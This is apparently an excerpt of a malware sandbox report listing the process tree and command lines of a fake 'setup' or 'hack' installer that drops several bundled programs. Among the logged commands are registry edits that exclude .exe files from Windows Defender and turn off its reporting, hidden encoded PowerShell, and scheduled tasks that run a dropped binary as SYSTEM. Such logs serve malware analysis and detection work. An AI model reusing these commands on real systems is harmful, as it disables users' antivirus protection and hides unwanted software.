PID 1588 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
PID 1588 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
PID 1800 wrote to memory of 4296 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
PID 1800 wrote to memory of 4296 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
PID 1800 wrote to memory of 4296 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
PID 1800 wrote to memory of 4520 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
PID 1800 wrote to memory of 4520 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
PID 1800 wrote to memory of 4520 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
PID 4296 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
PID 4296 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
PID 4296 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
PID 4384 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4384 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4384 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Program Files (x86)\ScanRename\ScanRename.exe
PID 4384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Program Files (x86)\ScanRename\ScanRename.exe
PID 4384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Program Files (x86)\ScanRename\ScanRename.exe
PID 4520 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 2016 wrote to memory of 3212 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 3212 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 3212 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1776 wrote to memory of 2752 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1776 wrote to memory of 2752 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1776 wrote to memory of 2752 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3212 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3212 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3212 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2752 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2752 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe

"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp" /SL5="$E005E,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1616 -ip 1616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 140

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1316

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1176

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1924

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Documents\best_hack.zip_id23904541.exe

"C:\Users\Admin\Documents\best_hack.zip_id23904541.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252

C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe

C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe /VERYSILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 1800 -ip 1800

C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe

C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp" /SL5="$10302,2567431,54272,C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe"

C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe

C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2332

C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

"C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe"

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe

C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe /S /site_id=757674

C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe

C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp" /SL5="$30336,990754,54272,C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename"

C:\Program Files (x86)\ScanRename\ScanRename.exe

"C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1332

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2084

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit

C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe

C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe /sid=3 /pid=449

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gwUPXilBw" /SC once /ST 13:30:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "ScanRename.exe" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gwUPXilBw"

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2396

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2480

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2412

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2520

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe & exit

C:\Windows\system32\PING.EXE

ping 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2316

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2444

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gwUPXilBw"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe\" bt /site_id 757674 /S" /V1 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948

C:\Windows\SysWOW64\fontview.exe

"C:\Windows\SYSWOW64\fontview.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 1800 -ip 1800

